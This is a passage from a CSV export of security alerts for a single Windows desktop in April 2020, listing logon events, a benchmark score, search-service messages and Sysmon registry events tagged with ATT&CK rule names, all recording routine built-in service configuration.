Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:18.788",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 13:22:17.723",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. 
This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:17.575",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:22:17.358",3,"The database engine attached a database",,"""SearchIndexer (4572,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). 
(Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0022:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.001499 -0.001255 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.009504 -0.005318 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:40, WS:120K # 0K, PF:144K # 0K, P:144K) +[4] 0.000118 +J(0) +[5] - +[6] - +[7] - +[8] 0.001845 -0.000557 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.029629 -0.000149 (5) CM -0.029234 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000217 -0.000106 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000017 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000054 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000007 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:22:17.230",3,"The database engine is starting a new instance",,"""SearchIndexer (4572,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:22:16.507",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:08.304488700Z"",""eventRecordID"":""1132"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: 
SetValue\r\nUtcTime: 2020-04-24 13:22:08.279\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:08.279"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:08.279 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:16.259",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.853984700Z"",""eventRecordID"":""1125"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.763\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k 
UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.763"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.763 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.192",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.853676800Z"",""eventRecordID"":""1124"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.763\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 
13:22:07.763"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.763 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:16.171",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.852513600Z"",""eventRecordID"":""1123"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k 
UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.126",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.852032400Z"",""eventRecordID"":""1122"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_42bf6\Start +Details: 
DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:16.034",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.850867900Z"",""eventRecordID"":""1121"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_42bf6\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.001",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.850557100Z"",""eventRecordID"":""1120"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.952",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.849328600Z"",""eventRecordID"":""1119"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 13:22:15.924",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.848997300Z"",""eventRecordID"":""1118"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.902",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.847821800Z"",""eventRecordID"":""1117"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.846",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.847501400Z"",""eventRecordID"":""1116"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.799",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.846320300Z"",""eventRecordID"":""1115"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.742",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.845910700Z"",""eventRecordID"":""1114"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:15.683",9,"ATT&CK T1058:Registry edit for new 
